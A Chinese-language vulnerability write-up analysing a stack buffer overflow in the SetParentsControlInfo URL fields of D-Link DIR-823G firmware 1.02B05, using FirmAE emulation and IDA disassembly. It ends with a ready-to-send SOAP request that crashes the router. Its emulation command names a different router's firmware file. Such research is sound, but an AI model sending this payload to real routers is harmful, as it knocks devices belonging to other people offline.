漏洞描述
D-Link DIR-823G firmwareversion 1.02B05 has a buffer overflow vulnerability, which originates from the URL field in SetParentsControlInfo.
漏洞复现工具
虚拟机:Ubuntu18.04
固件版本:DIR823G_V1.0.2B05_20181207.bin
工具:FirmAE、binwalk、ida
模拟路由环境
FirmAE仿真路由环境
sudo ./run.sh -r LBT /home/ccc/DIR859Ax_FW105b03.bin
漏洞分析
根据CVE漏洞描述来源SetParentsControlInfo中的URL变量,在固件中搜索字符串,发现SetParentsControlInfo出现在goahead文件中,放入IDA中反汇编
搜索URL字符串,查看引用函数
对引用的函数逐个查看,发现栈溢出发生在sub_469F78函数
查看sub_469F78函数,分析发现栈溢出由于使用strncpy,V104-V111字符数组长度64,分别存储URL1-URL8,URL1-URL8的长度未进行限制,因此发生溢出
由此反向推断函数调用链为:main()->sub_423F90()->sub_42383C()->(LOAD段)sub_46B6E8->sub_469F78
main函数调用sub_423F90,通过sub_423F90返回值进行判断。sub_423F90调用sub_42383C进行/HNAP1请求的处理
sub_42383C调用off_588D80表中的内容进行比对,off_588D80表中存储的函数对应的动作,sub_46B6E8位于该表中
sub_46B6E8函数即为SetParentsControlInfo函数
该漏洞通过请求头设置SetParentsControlInfo动作触发该调用链,造成栈溢出
漏洞复现
Poc
1. 编写python脚本验证
2. 使用火狐浏览器对请求包进行编辑重发进行漏洞验证,依次点击火狐浏览器的开发者工具->Network->192.168.0.1/HNAP1/(任意一个HNAP1都可以)->Resend(右上角)
然后更改New Request界面下的SOAPAction和Body内容,如下,难后点击Send验证漏洞效果
1."http://purenetworks.com/HNAP1/SetParentsControlInfo" 2.<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetParentsControlInfo xmlns="http://purenetworks.com/HNAP1/"><UsersInfo><HostName>1</HostName><Mac>1</Mac><IndexEnable>1</IndexEnable><StartTime>00:00:00</StartTime><EndTime>23:59:00</EndTime><Week>Sun</Week><UrlEnable>1</UrlEnable><URL1>cp.com</URL1><URL2></URL2><URL3></URL3><URL4></URL4><URL5></URL5><URL6></URL6><URL7></URL7><URL8>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</URL8><GroupId>1</GroupId></UsersInfo></SetParentsControlInfo></soap:Body></soap:Envelope>
路由环境崩了,说明漏洞验证成功